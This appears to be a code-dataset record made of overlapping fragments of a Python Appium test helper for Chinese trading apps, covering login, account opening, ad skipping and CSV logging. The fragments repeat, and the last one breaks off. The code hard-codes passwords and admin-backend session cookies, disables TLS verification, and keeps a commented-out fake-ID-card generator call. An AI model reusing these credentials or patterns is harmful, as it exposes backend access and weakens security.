# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv) | 'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000, | random_line_split |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
# ========= Parameters to adjust when switching between UAT/PRD test builds =========
# Target OS
OS = 'Windows'
# UAT
#package_name = 'com.szoc.zb.cs'
# PRD
#package_name = 'com.gwtsz.gts2.cf'
# cf2
package_name = 'com.gwtsz.gts2.cf2'
# cf3
#package_name = 'com.gwtsz.gts2.cf3'
# Project directory (the folder containing this file)
dir_path = os.path.dirname(os.path.realpath(__file__))
# PRD build
if(package_name == 'com.gwtsz.gts2.cf'):
    # APK path
    apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '创富CFD V_1.8.5'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81135805'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# UAT build
elif(package_name == 'com.szoc.zb.cs'):
    # APK path
    apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = 'ISTONE V_1.8.3'
    # "About" title (used by the about-page check)
    about_us_expect = '关于神龙科技'
    # Login accounts
    main_user_id = '81018322'
    main_user_demo_id = '11002074'
    main_user_password = 'abc123'
# CF2 build
elif(package_name == 'com.gwtsz.gts2.cf2'):
    # APK path
    apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81134740'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# CF3 build
else:
    # APK path
    # Fix: the cf3 branch previously concatenated without the '/' separator,
    # producing a path inside the parent directory instead of the project dir.
    apk_url = dir_path + '/release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '白银交易平台 V_1.8.5'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81134740'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# ========= end of UAT/PRD switch parameters =========
account_csv = '帳號列表.csv'
# Old APK path (for upgrade-install tests)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
# Device / OS version / package under test.
# Desired capabilities: do NOT reset the app between sessions.
desired_caps = {
    #'platformName':'Android',
    #'platformVersion':'5.1.1',
    #'deviceName':'Android Emulator',
    'platformName':'Android',
    'platformVersion':'10',
    'deviceName':'Mi 9t',
    'appPackage': package_name,
    'appActivity':'gw.com.android.ui.WelcomeActivity',
    'newCommandTimeout':6000,
    'noReset':True
}
# Desired capabilities: reset the app on every session.
desired_caps_reset = {
    'platformName':desired_caps['platformName'],
    'platformVersion':desired_caps['platformVersion'],
    'deviceName':desired_caps['deviceName'],
    'appPackage':desired_caps['appPackage'],
    'appActivity':desired_caps['appActivity'],
    'newCommandTimeout':desired_caps['newCommandTimeout'],
    'noReset':False
}
# Desired capabilities: do not launch the app, just open the home screen.
desired_install = {
    'platformName':desired_caps['platformName'],
    'platformVersion':desired_caps['platformVersion'],
    'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
# Check whether the app is installed; install it automatically if not.
def check_app_installed():
    """Open a bare session and install the APK when the target package is absent."""
    session = webdriver.Remote(Remote_url, desired_install)
    already_installed = session.is_app_installed(desired_caps['appPackage'])
    if already_installed:
        print('APP已經安裝')
    else:
        session.install_app(apk_url)
        print('APP安裝完畢')
    session.quit()
# Skip ads shown at launch.
def skip_ads(self):
    """Wait out the splash screen, then dismiss any splash ad, upgrade
    dialog or pop-up ad; elements that never appeared are ignored."""
    time.sleep(12)
    optional_ids = (
        package_name + ':id/tv_skip',      # splash-ad "skip" button
        package_name + ':id/btn_cancel',   # version-upgrade "cancel" button
        package_name + ':id/close_btn',    # pop-up-ad "close" button
    )
    for resource_id in optional_ids:
        try:
            self.driver.find_element_by_id(resource_id).click()
        except NoSuchElementException:
            pass
# Skip ads without waiting out the splash screen.
def skip_ads_no_wait(self):
    """Briefly lower the implicit wait, dismiss any splash ad / upgrade
    dialog / pop-up ad, then restore the 10-second implicit wait."""
    # Short 2-second implicit wait so absent elements fail fast.
    self.driver.implicitly_wait(2)
    optional_ids = (
        package_name + ':id/tv_skip',      # splash-ad "skip" button
        package_name + ':id/btn_cancel',   # version-upgrade "cancel" button
        package_name + ':id/close_btn',    # pop-up-ad "close" button
    )
    for resource_id in optional_ids:
        try:
            self.driver.find_element_by_id(resource_id).click()
        except NoSuchElementException:
            pass
    self.driver.implicitly_wait(10)
# Dismiss a text pop-up dialog, if present.
def skip_pop_ups_dialog(self):
    try:
        # Tap the "立即前往" text pop-up.
        self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
        time.sleep(2)
        # Close the H5 page the pop-up opened.
        self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
    except NoSuchElementException:
        pass
# Tap "allow" on a permission dialog (while inside the app).
def click_allow(self):
    try:
        self.driver.find_element_by_xpath("//*[@text='允許']").click()
        print('點擊允許')
    except NoSuchElementException:
        print('允許未跳出')
# Tap "allow" on a permission dialog (outside the app, via a temporary session).
def click_allow_outside_app():
    driver_allow = webdriver.Remote(Remote_url, desired_install)
    try:
        driver_allow.find_element_by_xpath("//*[@text='允許']").click()
        print('點擊允許')
    except NoSuchElementException:
        print('允許未跳出')
    # Tear the temporary session down whether or not the dialog appeared.
    driver_allow.quit()
# Open the "Me" tab.
def press_my_button(self):
    """Tap near the bottom-right corner of the screen to open the "Me" tab."""
    time.sleep(2)
    width = self.driver.get_window_size()['width']
    height = self.driver.get_window_size()['height']
    # Coordinate tap: the bottom tab bar has no reliable resource id here.
    TouchAction(self.driver).tap(element=None, x=width * 0.9, y=height - 1, count=1).perform()
# Quotation ("行情") tab.
def click_quotation(self):
    # Absolute view-hierarchy XPath (index [2] in the bottom RecyclerView
    # tab bar) — brittle; breaks whenever the layout changes.
    element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
    element.click()
# Trade ("交易") tab.
def click_transaction(self):
    # Same brittle absolute-XPath locator, tab index [3].
    element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
    element.click()
# Fetch the real account's information.
def get_account_information(self):
    """Open the account dialog from the "Me" page and return
    (account_number, account_level) as shown in the dialog."""
    # Switch to the "Me" tab first.
    press_my_button(self)
    # Tap the avatar to open the account-info dialog.
    self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
    # Account number.
    account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
    # Account level.
    account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
    self.driver.find_element_by_xpath("//*[@text='知道了']").click()
    return account_num,account_lvl
# Fetch the demo account's information.
def get_demo_account_information(self):
    """Open the account dialog from the "Me" page and return the demo
    account number (demo accounts show no level field)."""
    # Switch to the "Me" tab first.
    press_my_button(self)
    # Tap the avatar to open the account-info dialog.
    self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
    # Account number.
    account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
    self.driver.find_element_by_xpath("//*[@text='知道了']").click()
    return account_num
# Close the share pop-up.
def close_share_window(self):
    self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
# Tap the home-page message centre.
def click_home_message_center(self):
    time.sleep(2)
    x=self.driver.get_window_size()['width']
    y=self.driver.get_window_size()['height']
    # Coordinate tap (~81% across, near the top bar).
    TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
    # By resource id (kept for reference):
    #self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
# Tap the home-page customer-service entry.
def click_home_customer_service(self):
    # By resource id (kept for reference):
    #self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
    time.sleep(2)
    x=self.driver.get_window_size()['width']
    y=self.driver.get_window_size()['height']
    # Coordinate tap (~93% across, near the top bar).
    TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
# "Me" page: open settings.
def click_mypage_setting(self):
    self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
# "Me" page: open the message centre.
def click_mypage_message_center(self):
    self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
# Message centre: tap the back button.
def click_message_center_return(self):
    # Absolute view-hierarchy XPath — brittle; breaks if the layout changes.
    el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
    el2.click()
# "Me" page: open live customer service.
def click_mypage_customer_service(self):
    self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
# "Me" page: switch between real and demo accounts.
def click_mypage_switch_account(self):
    self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
# "Me" page: deposit.
def click_mypage_deposit(self):
    self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
# "Me" page: withdraw.
def click_mypage_withdraw(self):
    self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
# "Me" page: open funds detail.
def click_mypage_funding_details(self):
    self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
# Switch to the home tab.
def press_home_tab(self):
    self.driver.find_element_by_xpath("//*[@text='首页']").click()
# Tap the home-page carousel banner.
def click_home_banner(self):
    """Tap the banner area (centred, ~1/5 from the top) three times."""
    time.sleep(2)
    width = self.driver.get_window_size()['width']
    height = self.driver.get_window_size()['height']
    for _ in range(3):
        # Coordinate tap on the carousel region.
        TouchAction(self.driver).tap(element=None, x=width / 2, y=height / 5, count=1).perform()
# Tap home-page "login/register".
def click_home_register_login(self):
    # Coordinate tap only fits 2340*1080 screens (kept for reference):
    #TouchAction(self.driver).tap(x=931, y=2149).perform()
    # Text locator works on all screen sizes, but is slower.
    self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
    """Tap "open real account" on the home page; if the button is missing
    (e.g. already logged in), log out, return home and retry.
    NOTE(review): retries forever if the button never appears — confirm
    this unbounded loop is intended."""
    #TouchAction(self.driver).tap(x=750, y=1300).perform()
    while True:
        try:
            # Home page: open a real account.
            self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
            break
        except NoSuchElementException:
            # Log out, go back to the home page, skip ads, then retry.
            Logout(self)
            press_home_tab(self)
            skip_ads(self)
def click_home_demo_account(self):
    """Same retry pattern as click_home_real_account, for the demo button."""
    #TouchAction(self.driver).tap(x=250, y=1300).perform()
    while True:
        try:
            # Home page: open a demo account.
            self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
            break
        except NoSuchElementException:
            # Log out, go back to the home page, skip ads, then retry.
            Logout(self)
            press_home_tab(self)
            skip_ads(self)
# Login page: tap "open account".
def click_login_create_account(self):
    self.driver.find_element_by_id(package_name+":id/open_account_button").click()
# Tap "open demo account".
def click_create_demo_account(self):
    self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
# Close the H5 web view.
def close_html5(self):
    # Close the H5 page.
    self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
# Scroll the current view downwards.
def scroll_down(self):
    """Swipe upward along the screen centre so the content scrolls down."""
    time.sleep(2)
    width = self.driver.get_window_size()['width']
    height = self.driver.get_window_size()['height']
    centre_x = width / 2
    start_y = height * 0.8
    end_y = height * 0.3
    self.driver.swipe(centre_x, start_y, centre_x, end_y, 1000)
# "Tailored for you" (懂你所需) section: swipe left.
def clever_need_swipe_left(self):
    """Swipe the section's carousel leftwards.
    NOTE(review): the swipe spans only 0.72→0.6 of the width — quite short;
    confirm it actually advances a full card."""
    time.sleep(2)
    x=self.driver.get_window_size()['width']
    y=self.driver.get_window_size()['height']
    # Anchor the swipe just below the section's top edge.
    coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
    y1 = coordinates['y'] + y/10
    x1 = x*0.72
    x2 = x*0.6
    self.driver.swipe(x1,y1,x2,y1,1000)
# "Tailored for you" (懂你所需) section: swipe right.
def clever_need_swipe_right(self):
    """Swipe the section's carousel rightwards (x from 1/4 to 3/4 of width)."""
    time.sleep(2)
    x=self.driver.get_window_size()['width']
    y=self.driver.get_window_size()['height']
    # Anchor the swipe just below the section's top edge.
    coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
    y1 = coordinates['y'] + y/10
    x2 = x*3/4
    x1 = x/4
    self.driver.swipe(x1,y1,x2,y1,1000)
# Generate a random password.
def generate_random_password(self):
    """Return a random password of 7-9 characters: 6-8 alphanumerics
    followed by one guaranteed digit.

    Fix: the character set previously omitted the letter 'r'
    ('...nopqstuvwxyz...').
    """
    chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    last_index = len(chars) - 1
    random_password = ''
    for i in range(random.randint(6,8)):
        random_password += chars[random.randint(0, last_index)]
    # Guarantee at least one digit by appending one.
    random_password += str(random.randint(0,9))
    return random_password
# Generate a random phone number.
def random_phone_number(self):
    """Return a random 11-digit mainland-China mobile number: a known
    3-digit prefix followed by 8 random digits."""
    area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
        '138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
    digits = '0123456789'
    phone = random.choice(area_list)
    phone += ''.join(digits[random.randint(0, 9)] for _ in range(8))
    return phone
# Generate a random Chinese name.
def random_chinese_name(self):
    """Return a 4-character test name: the fixed prefix '測試' followed by
    two random CJK ideographs."""
    suffix = ''.join(chr(random.randint(0x4e00, 0x9fbf)) for _ in range(2))
    return '測試' + suffix
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
# Verification-code API.
def register_demo_account_api(self,random_phone):
    """POST random_phone to the backend and return the SMS verification
    code (the 'data' field of the JSON response).
    NOTE(review): session cookies are hard-coded and will expire; the PRD
    branch also disables TLS verification (verify=False) — both are test
    conveniences, not production-safe."""
    if(package_name == 'com.szoc.zb.cs'):
        # UAT backend.
        request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
        payload = random_phone
        headers = {
            'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
            'Content-Type': 'text/plain'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload)
        data = response.json()
        # Return the verification code.
        return data['data']
    else:
        # PRD backend.
        request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
        payload = random_phone
        headers = {
            'Connection': 'close',
            'authority': 'office.cf139.com',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
            'content-type': 'application/json;charset=UTF-8',
            'origin': 'https://office.cf139.com',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-mode': 'cors',
            'sec-fetch-dest': 'empty',
            'referer': 'https://office.cf139.com/home/validater/validateNo',
            'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
            'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
        #print(response.text.encode('utf8'))
        data = response.json()
        # Return the verification code.
        return data['data']
# Whitelist API.
def White_List_API(self,random_phone):
    """Add random_phone to the backend whitelist.
    NOTE(review): the UAT branch only prints the result and implicitly
    returns None, while the PRD branch returns data['data'] — confirm
    callers tolerate both. Cookies are hard-coded; PRD disables TLS
    verification (verify=False)."""
    if(package_name == 'com.szoc.zb.cs'):
        # UAT backend.
        request_url = "http://mis.will68.com/whitelists/edit"
        payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
        headers = {
            'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
            'Content-Type': 'application/json'
        }
        response = requests.request("POST", request_url, headers=headers, data = payload)
        data = response.json()
        print('添加白名單結果為:',data['msg'])
    else:
        # PRD backend.
        request_url = "https://office.cf139.com/whitelists/edit"
        seconds = str(int(time.time()))
        #payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
        payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
        headers = {
            'authority': 'office.cf139.com',
            'accept': 'application/json, text/plain, */*',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'content-type': 'application/json;charset=UTF-8',
            'origin': 'https://office.cf139.com',
            'sec-fetch-site': 'same-origin',
            'sec-fetch-mode': 'cors',
            'sec-fetch-dest': 'empty',
            'referer': 'https://office.cf139.com/home/whitelist/index',
            'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
            'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
        }
        # latin1 re-encode works around the server's charset expectations.
        response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
        #print(response.text.encode('utf8'))
        data = response.json()
        # Return the response payload.
        return data['data']
# Log in.
def Login(self):
    """Log in with the main account from the home page; treated as a
    no-op (already logged in) when the login form is absent."""
    try:
        # Open the login/register screen.
        click_home_register_login(self)
        account_field = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
        account_field.clear()
        account_field.send_keys(main_user_id)
        password_field = self.driver.find_element_by_id(package_name+":id/password")
        password_field.clear()
        password_field.send_keys(main_user_password)
        sign_in_button = self.driver.find_element_by_id(package_name+":id/sign_in_button")
        sign_in_button.click()
        # Dismiss ads shown right after login.
        skip_ads_no_wait(self)
    except NoSuchElementException:
        print('已登入...\n')
# Log out.
def Logout(self):
    """Open the "Me" tab, enter settings, tap log-out and confirm."""
    # Switch to the "Me" page first.
    press_my_button(self)
    settings_icon = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
    settings_icon.click()
    logout_entry = self.driver.find_element_by_xpath("//*[@text='退出登录']")
    logout_entry.click()
    confirm_button = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
    confirm_button.click()
def check_new_account_login(self,account_type,password,random_phone):
    """After opening a new account, verify the app reaches the logged-in
    screen, then append the account's details to the account CSV.

    account_type: '真實' for a real account, anything else for a demo one.
    password / random_phone: credentials used during registration.
    Raises AssertionError when the post-registration screen never appears.

    Fix: the demo-branch CSV row was corrupted in the original text;
    reconstructed, and the two near-identical branches deduplicated.
    """
    # Timestamp recorded alongside the account row.
    current_time = datetime.now().isoformat()
    try:
        # Tap "立即体验" on the registration-success dialog.
        self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
        # Skip ads without waiting out the splash screen.
        skip_ads_no_wait(self)
        if(account_type=='真實'):
            # Real accounts expose both an account number and a level.
            account_num,account_lvl = get_account_information(self)
            print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
        else:
            # Demo accounts have no level field.
            account_num = get_demo_account_information(self)
            account_lvl = ''
            print('開戶成功!帳號為:'+account_num)
    except NoSuchElementException:
        print('錯誤!開戶後無法正常進入登入後畫面')
        raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
    # Row layout: [account, phone, password, real/demo, level, time, package]
    _append_account_row([account_num,random_phone,password,account_type,account_lvl,current_time,package_name])
def _append_account_row(account_information):
    """Append one account row to the account CSV, preserving existing rows."""
    # Read the current contents so the rewrite keeps every existing row.
    with open(account_csv, newline='',encoding="utf-8") as csvfile:
        writed_csv = list(csv.reader(csvfile))
    writed_csv.append(account_information)
    with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
        csv.writer(csvfile).writerows(writed_csv)
| identifier_body | |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
# ========= Parameters to adjust when switching between UAT/PRD test builds =========
# Target OS
OS = 'Windows'
# UAT
#package_name = 'com.szoc.zb.cs'
# PRD
#package_name = 'com.gwtsz.gts2.cf'
# cf2
package_name = 'com.gwtsz.gts2.cf2'
# cf3
#package_name = 'com.gwtsz.gts2.cf3'
# Project directory (the folder containing this file)
dir_path = os.path.dirname(os.path.realpath(__file__))
# PRD build
if(package_name == 'com.gwtsz.gts2.cf'):
    # APK path
    apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '创富CFD V_1.8.5'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81135805'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# UAT build
elif(package_name == 'com.szoc.zb.cs'):
    # APK path
    apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = 'ISTONE V_1.8.3'
    # "About" title (used by the about-page check)
    about_us_expect = '关于神龙科技'
    # Login accounts
    main_user_id = '81018322'
    main_user_demo_id = '11002074'
    main_user_password = 'abc123'
# CF2 build
elif(package_name == 'com.gwtsz.gts2.cf2'):
    # APK path
    apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81134740'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# CF3 build
else:
    # APK path
    # Fix: the cf3 branch previously concatenated without the '/' separator,
    # producing a path inside the parent directory instead of the project dir.
    apk_url = dir_path + '/release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
    # App name & version (used by the "About us" check)
    app_name_version_expect = '白银交易平台 V_1.8.5'
    # "About" title (used by the about-page check)
    about_us_expect = '关于创富'
    # Login accounts
    main_user_id = '81134740'
    main_user_demo_id = '11092003'
    main_user_password = 'abc123'
# ========= end of UAT/PRD switch parameters =========
account_csv = '帳號列表.csv'
# Old APK path (for upgrade-install tests)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
# Device / OS version / package under test.
# Desired capabilities: do NOT reset the app between sessions.
desired_caps = {
    #'platformName':'Android',
    #'platformVersion':'5.1.1',
    #'deviceName':'Android Emulator',
    'platformName':'Android',
    'platformVersion':'10',
    'deviceName':'Mi 9t',
    'appPackage': package_name,
    'appActivity':'gw.com.android.ui.WelcomeActivity',
    'newCommandTimeout':6000,
    'noReset':True
}
# Desired capabilities: reset the app on every session.
desired_caps_reset = {
    'platformName':desired_caps['platformName'],
    'platformVersion':desired_caps['platformVersion'],
    'deviceName':desired_caps['deviceName'],
    'appPackage':desired_caps['appPackage'],
    'appActivity':desired_caps['appActivity'],
    'newCommandTimeout':desired_caps['newCommandTimeout'],
    'noReset':False
}
# Desired capabilities: do not launch the app, just open the home screen.
desired_install = {
    'platformName':desired_caps['platformName'],
    'platformVersion':desired_caps['platformVersion'],
    'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
# Quotation ("行情") tab.
def click_quotation(self):
    """Switch to the quotation tab via its absolute view-hierarchy XPath.

    Fix: the XPath string literal had been corrupted (a middle chunk was
    missing); restored to the known-good locator (index [2] in the bottom
    RecyclerView tab bar). Brittle — breaks if the layout changes.
    """
